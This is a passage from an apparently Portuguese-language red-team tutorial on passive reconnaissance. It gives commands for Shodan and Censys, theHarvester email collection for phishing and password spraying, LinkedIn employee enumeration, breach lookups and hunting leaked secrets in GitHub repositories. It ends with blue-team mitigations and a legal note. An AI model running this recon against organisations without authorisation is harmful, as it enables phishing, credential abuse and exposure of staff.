style="color:#61AFEF">gowitness</span><span style="color:#98C379"> file</span><span style="color:#D19A66"> -f</span><span style="color:#98C379"> -</span><span style="color:#D19A66"> --screenshot-path</span><span style="color:#98C379"> ./screenshots/</span></span> <span class="line"><span style="color:#61AFEF">gowitness</span><span style="color:#98C379"> report</span><span style="color:#98C379"> serve</span></span></code></pre> <hr> <h2 id="fase-3--shodan--censys">Fase 3 — Shodan &#x26; Censys</h2> <p>Motores de busca para dispositivos e serviços expostos na internet.</p> <h3 id="shodan">Shodan</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Instalação do CLI</span></span> <span class="line"><span style="color:#61AFEF">pip</span><span style="color:#98C379"> install</span><span style="color:#98C379"> shodan</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> init</span><span style="color:#98C379"> YOUR_API_KEY</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Busca por organização</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> search</span><span style="color:#98C379"> "org:</span><span style="color:#56B6C2">\"</span><span style="color:#98C379">Target Company</span><span style="color:#56B6C2">\"</span><span style="color:#98C379">"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Filtrando por ASN</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> search</span><span style="color:#98C379"> "asn:AS12345"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Serviços específicos expostos</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> search</span><span style="color:#98C379"> "hostname:target.com port:22"</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> search</span><span style="color:#98C379"> "hostname:target.com http.title:</span><span style="color:#56B6C2">\"</span><span style="color:#98C379">Dashboard</span><span style="color:#56B6C2">\"</span><span style="color:#98C379">"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Vulnerabilidades conhecidas na infra</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> search</span><span style="color:#98C379"> "org:</span><span style="color:#56B6C2">\"</span><span style="color:#98C379">Target</span><span style="color:#56B6C2">\"</span><span style="color:#98C379"> vuln:CVE-2021-44228"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Download completo dos resultados</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> download</span><span style="color:#D19A66"> --limit</span><span style="color:#D19A66"> 1000</span><span style="color:#98C379"> results.json.gz</span><span style="color:#98C379"> "org:</span><span style="color:#56B6C2">\"</span><span style="color:#98C379">Target Company</span><span style="color:#56B6C2">\"</span><span style="color:#98C379">"</span></span> <span class="line"><span style="color:#61AFEF">shodan</span><span style="color:#98C379"> parse</span><span style="color:#98C379"> results.json.gz</span><span style="color:#D19A66"> --fields</span><span style="color:#98C379"> ip_str,port,hostnames,vulns</span></span></code></pre> <h3 id="queries-shodan-úteis">Queries Shodan Úteis</h3> <table><thead><tr><th>Query</th><th>O que Encontra</th></tr></thead><tbody><tr><td><code>org:"Target" http.title:"Jenkins"</code></td><td>Servidores Jenkins expostos</td></tr><tr><td><code>org:"Target" product:"Apache Tomcat"</code></td><td>Tomcat sem autenticação</td></tr><tr><td><code>org:"Target" http.favicon.hash:-1616143106</code></td><td>GitLab instances</td></tr><tr><td><code>org:"Target" port:3389</code></td><td>RDP exposto</td></tr><tr><td><code>org:"Target" ssl.cert.subject.cn:"*.target.com"</code></td><td>Certificados wildcard</td></tr><tr><td><code>org:"Target" "220" "230 Login"</code></td><td>FTP anônimo ativo</td></tr></tbody></table> <h3 id="censys">Censys</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># API via Python</span></span> <span class="line"><span style="color:#61AFEF">pip</span><span style="color:#98C379"> install</span><span style="color:#98C379"> censys</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Busca de hosts por certificado</span></span> <span class="line"><span style="color:#61AFEF">python3</span><span style="color:#98C379"> -</span><span style="color:#ABB2BF"> &#x3C;&#x3C;</span><span style="color:#ABB2BF">'EOF'</span></span> <span class="line"><span style="color:#98C379">from censys.search import CensysHosts</span></span> <span class="line"><span style="color:#98C379">h = CensysHosts()</span></span> <span class="line"><span style="color:#98C379">query = "parsed.names: target.com and services.tls.certificates.leaf_data.subject.organization: \"Target\""</span></span> <span class="line"><span style="color:#98C379">for hit in h.search(query, pages=3):</span></span> <span class="line"><span style="color:#98C379"> print(hit["ip"], hit.get("services"))</span></span> <span class="line"><span style="color:#ABB2BF">EOF</span></span></code></pre> <hr> <h2 id="fase-4--theharvester">Fase 4 — theHarvester</h2> <p>Coleta emails, nomes, hosts e IPs de fontes públicas.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Instalação</span></span> <span class="line"><span style="color:#61AFEF">git</span><span style="color:#98C379"> clone</span><span style="color:#98C379"> https://github.com/laramies/theHarvester</span></span> <span class="line"><span style="color:#56B6C2">cd</span><span style="color:#98C379"> theHarvester</span><span style="color:#ABB2BF"> &#x26;&#x26; </span><span style="color:#61AFEF">pip3</span><span style="color:#98C379"> install</span><span style="color:#D19A66"> -r</span><span style="color:#98C379"> requirements/base.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Coleta básica com múltiplas fontes</span></span> <span class="line"><span style="color:#61AFEF">python3</span><span style="color:#98C379"> theHarvester.py</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -b</span><span style="color:#98C379"> google,bing,linkedin,hunter,anubis,crtsh</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -l</span><span style="color:#D19A66"> 500</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -f</span><span style="color:#98C379"> report_target</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Apenas emails (para phishing / password spraying)</span></span> <span class="line"><span style="color:#61AFEF">python3</span><span style="color:#98C379"> theHarvester.py</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -d</span><span style="color:#98C379"> target.com</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -b</span><span style="color:#98C379"> linkedin,hunter,google</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -l</span><span style="color:#D19A66"> 200</span><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">grep</span><span style="color:#D19A66"> -E</span><span style="color:#98C379"> "^[a-zA-Z0-9._%+-]+@"</span></span></code></pre> <hr> <h2 id="fase-5--reconhecimento-de-pessoas">Fase 5 — Reconhecimento de Pessoas</h2> <h3 id="linkedin-osint">LinkedIn OSINT</h3> <p>Identificar funcionários, cargos e tecnologias usadas.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Via Google Dorks</span></span> <span class="line"><span style="color:#61AFEF">site:linkedin.com/in</span><span style="color:#98C379"> "Target Company"</span><span style="color:#98C379"> "Security Engineer"</span></span> <span class="line"><span style="color:#61AFEF">site:linkedin.com/in</span><span style="color:#98C379"> "Target Company"</span><span style="color:#98C379"> "DevOps"</span></span> <span class="line"><span style="color:#61AFEF">site:linkedin.com/in</span><span style="color:#98C379"> "Target Company"</span><span style="color:#98C379"> "Active Directory"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Ferramentas</span></span> <span class="line"><span style="color:#61AFEF">pip</span><span style="color:#98C379"> install</span><span style="color:#98C379"> linkedin2username</span></span> <span class="line"><span style="color:#61AFEF">python3</span><span style="color:#98C379"> linkedin2username.py</span><span style="color:#D19A66"> -u</span><span style="color:#98C379"> YOUR_EMAIL</span><span style="color:#D19A66"> -c</span><span style="color:#98C379"> "Target Company"</span></span></code></pre> <h3 id="email-format-discovery">Email Format Discovery</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Hunter.io CLI</span></span> <span class="line"><span style="color:#61AFEF">curl</span><span style="color:#98C379"> "https://api.hunter.io/v2/domain-search?domain=target.com&#x26;api_key=KEY"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">jq</span><span style="color:#98C379"> '.data.pattern'</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Exemplo de output: "{first}.{last}@target.com"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Verificação de emails com h8mail</span></span> <span class="line"><span style="color:#61AFEF">pip</span><span style="color:#98C379"> install</span><span style="color:#98C379"> h8mail</span></span> <span class="line"><span style="color:#61AFEF">h8mail</span><span style="color:#D19A66"> -t</span><span style="color:#98C379"> emails.txt</span><span style="color:#D19A66"> --breach-src</span><span style="color:#98C379"> haveibeenpwned</span></span></code></pre> <hr> <h2 id="fase-6--análise-de-código-público">Fase 6 — Análise de Código Público</h2> <p>Repositórios públicos frequentemente contêm credenciais, tokens e infraestrutura interna acidentalmente commitados.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># GitHub Dorks — busca direto no site</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># org:target-company password</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># org:target-company secret</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># org:target-company api_key</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># org:target-company internal</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Trufflehog — varredura de histórico git</span></span> <span class="line"><span style="color:#61AFEF">pip</span><span style="color:#98C379"> install</span><span style="color:#98C379"> trufflehog</span></span> <span class="line"><span style="color:#61AFEF">trufflehog</span><span style="color:#98C379"> github</span><span style="color:#D19A66"> --org=target-company</span><span style="color:#D19A66"> --only-verified</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># GitLeaks — scan de repositórios</span></span> <span class="line"><span style="color:#61AFEF">docker</span><span style="color:#98C379"> run</span><span style="color:#D19A66"> -v</span><span style="color:#ABB2BF"> $(</span><span style="color:#56B6C2">pwd</span><span style="color:#ABB2BF">)</span><span style="color:#98C379">:/path</span><span style="color:#98C379"> zricethezav/gitleaks:latest</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#98C379"> detect</span><span style="color:#D19A66"> --source=/path</span><span style="color:#D19A66"> --report-format</span><span style="color:#98C379"> json</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Greps específicos em repos clonados</span></span> <span class="line"><span style="color:#61AFEF">git</span><span style="color:#98C379"> clone</span><span style="color:#98C379"> https://github.com/target/public-repo</span></span> <span class="line"><span style="color:#56B6C2">cd</span><span style="color:#98C379"> public-repo</span></span> <span class="line"><span style="color:#61AFEF">grep</span><span style="color:#D19A66"> -rE</span><span style="color:#98C379"> "(password|passwd|secret|token|api_key|aws_access)"</span><span style="color:#98C379"> .</span></span> <span class="line"><span style="color:#61AFEF">grep</span><span style="color:#D19A66"> -rE</span><span style="color:#98C379"> "(https?://[^/]+:[^@]+@)"</span><span style="color:#98C379"> .</span><span style="color:#7F848E;font-style:italic"> # URLs com credenciais</span></span></code></pre> <hr> <h2 id="fase-7--análise-de-tecnologia-web">Fase 7 — Análise de Tecnologia Web</h2> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># WhatWeb — fingerprinting passivo via histórico/cache</span></span> <span class="line"><span style="color:#61AFEF">whatweb</span><span style="color:#D19A66"> -a</span><span style="color:#D19A66"> 1</span><span style="color:#98C379"> https://target.com</span><span style="color:#7F848E;font-style:italic"> # stealth mode</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># BuiltWith API</span></span> <span class="line"><span style="color:#61AFEF">curl</span><span style="color:#98C379"> "https://api.builtwith.com/v21/api.json?KEY=YOUR_KEY&#x26;LOOKUP=target.com"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">jq</span><span style="color:#98C379"> '.Results[].Result.Paths[].Technologies[].Name'</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Wappalyzer CLI</span></span> <span class="line"><span style="color:#61AFEF">npm</span><span style="color:#98C379"> install</span><span style="color:#D19A66"> -g</span><span style="color:#98C379"> wappalyzer</span></span> <span class="line"><span style="color:#61AFEF">wappalyzer</span><span style="color:#98C379"> https://target.com</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Wayback Machine — versões antigas do site</span></span> <span class="line"><span style="color:#61AFEF">curl</span><span style="color:#98C379"> "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&#x26;output=text&#x26;fl=original&#x26;collapse=urlkey"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">sort</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">head</span><span style="color:#D19A66"> -100</span></span></code></pre> <hr> <h2 id="consolidando-a-inteligência">Consolidando a Inteligência</h2> <p>Organize tudo em uma estrutura antes de partir para o reconhecimento ativo:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="plaintext"><code><span class="line"><span>target-intel/</span></span> <span class="line"><span>├── domains/</span></span> <span class="line"><span>│ ├── subdomains.txt # todos os subdomains descobertos</span></span> <span class="line"><span>│ ├── dns_records.txt # registros MX, TXT, NS</span></span> <span class="line"><span>│ └── whois.txt</span></span> <span class="line"><span>├── ips/</span></span> <span class="line"><span>│ ├── ip_ranges.txt # CIDRs do alvo</span></span> <span class="line"><span>│ └── shodan_results.json</span></span> <span class="line"><span>├── people/</span></span> <span class="line"><span>│ ├── employees.txt # nomes e cargos</span></span> <span class="line"><span>│ ├── emails.txt # emails coletados</span></span> <span class="line"><span>│ └── email_format.txt # padrão do formato</span></span> <span class="line"><span>├── tech/</span></span> <span class="line"><span>│ ├── stack.txt # tecnologias identificadas</span></span> <span class="line"><span>│ └── certificates.txt # certs SSL encontrados</span></span> <span class="line"><span>├── credentials/</span></span> <span class="line"><span>│ └── leaked_creds.txt # vazamentos em breaches</span></span> <span class="line"><span>└── code/</span></span> <span class="line"><span> └── github_findings.txt # achados em repos públicos</span></span></code></pre> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic">#!/bin/bash</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># passive_recon.sh — Pipeline completo de recon passivo</span></span> <span class="line"><span style="color:#E06C75">DOMAIN</span><span style="color:#56B6C2">=</span><span style="color:#98C379">"</span><span style="color:#E06C75;font-style:italic">${1</span><span style="color:#ABB2BF">:?</span><span style="color:#E06C75">Usage</span><span style="color:#ABB2BF">:</span><span style="color:#E06C75;font-style:italic"> $0</span><span style="color:#98C379"> &#x3C;</span><span style="color:#E06C75">domain</span><span style="color:#98C379">></span><span style="color:#E06C75;font-style:italic">}</span><span style="color:#98C379">"</span></span> <span class="line"><span style="color:#E06C75">OUTPUT</span><span style="color:#56B6C2">=</span><span style="color:#98C379">"./intel/${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#98C379">}"</span></span> <span class="line"><span style="color:#61AFEF">mkdir</span><span style="color:#D19A66"> -p</span><span style="color:#98C379"> "${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#98C379">}"/{domains,ips,people,tech}</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#98C379"> "[*] Starting passive recon for: ${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#98C379">}"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Subdomains</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#98C379"> "[+] Enumerating subdomains..."</span></span> <span class="line"><span style="color:#61AFEF">subfinder</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> "${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#98C379">}"</span><span style="color:#D19A66"> -all</span><span style="color:#D19A66"> -silent</span><span style="color:#ABB2BF"> > </span><span style="color:#98C379">"${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#98C379">}/domains/subfinder.txt"</span></span> <span class="line"><span style="color:#61AFEF">amass</span><span style="color:#98C379"> enum</span><span style="color:#D19A66"> -passive</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> "${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#98C379">}"</span><span style="color:#ABB2BF"> >> </span><span style="color:#98C379">"${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#98C379">}/domains/amass.txt"</span></span> <span class="line"><span style="color:#61AFEF">cat</span><span style="color:#98C379"> "${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#98C379">}/domains/subfinder.txt"</span><span style="color:#98C379"> "${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#98C379">}/domains/amass.txt"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">sort</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> > </span><span style="color:#98C379">"${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#98C379">}/domains/all_subdomains.txt"</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#98C379"> " $(</span><span style="color:#61AFEF">wc</span><span style="color:#D19A66"> -l</span><span style="color:#ABB2BF"> &#x3C;</span><span style="color:#98C379"> "${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#98C379">}/domains/all_subdomains.txt") unique subdomains"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># DNS</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#98C379"> "[+] Pulling DNS records..."</span></span> <span class="line"><span style="color:#61AFEF">dig</span><span style="color:#98C379"> "${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#98C379">}"</span><span style="color:#98C379"> ANY</span><span style="color:#98C379"> +short</span><span style="color:#ABB2BF"> > </span><span style="color:#98C379">"${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#98C379">}/domains/dns.txt"</span></span> <span class="line"><span style="color:#61AFEF">curl</span><span style="color:#D19A66"> -s</span><span style="color:#98C379"> "https://crt.sh/?q=%.${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#98C379">}&#x26;output=json"</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">jq</span><span style="color:#D19A66"> -r</span><span style="color:#98C379"> '.[].name_value'</span><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">sort</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> >> </span><span style="color:#98C379">"${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#98C379">}/domains/all_subdomains.txt"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Emails</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#98C379"> "[+] Harvesting emails..."</span></span> <span class="line"><span style="color:#61AFEF">python3</span><span style="color:#98C379"> theHarvester.py</span><span style="color:#D19A66"> -d</span><span style="color:#98C379"> "${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#98C379">}"</span><span style="color:#D19A66"> -b</span><span style="color:#98C379"> google,hunter</span><span style="color:#D19A66"> -l</span><span style="color:#D19A66"> 200</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">grep</span><span style="color:#D19A66"> -E</span><span style="color:#98C379"> "@${</span><span style="color:#E06C75">DOMAIN</span><span style="color:#98C379">}"</span><span style="color:#ABB2BF"> | </span><span style="color:#61AFEF">sort</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> > </span><span style="color:#98C379">"${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#98C379">}/people/emails.txt"</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#98C379"> "[✓] Recon complete. Output: ${</span><span style="color:#E06C75">OUTPUT</span><span style="color:#98C379">}"</span></span></code></pre> <hr> <h2 id="mitigações-blue-team">Mitigações (Blue Team)</h2> <table><thead><tr><th>Vetor</th><th>Mitigação</th></tr></thead><tbody><tr><td>Google Dorks</td><td>Google Search Console — remover URLs sensíveis do índice</td></tr><tr><td>WHOIS</td><td>Usar privacidade de domínio (WHOIS Privacy)</td></tr><tr><td>Certificate Transparency</td><td>Inevitável — use subdomains genéricos</td></tr><tr><td>Shodan</td><td>Firewalls com regras de não-scan; <code>X-Robots-Tag: noindex</code></td></tr><tr><td>GitHub leaks</td><td>Pre-commit hooks + secret scanning ativo</td></tr><tr><td>LinkedIn OSINT</td><td>Limitar informações de tecnologia em perfis públicos</td></tr></tbody></table> <blockquote> <p><strong>Nota legal:</strong> Estas técnicas devem ser utilizadas exclusivamente em engajamentos autorizados ou para fins educacionais. O uso não autorizado é ilegal.</p> </blockquote>redteam@kbmsecurity.com.brreconosintreconpassiveshodantheHarvesteramassgoogle-dorkseasy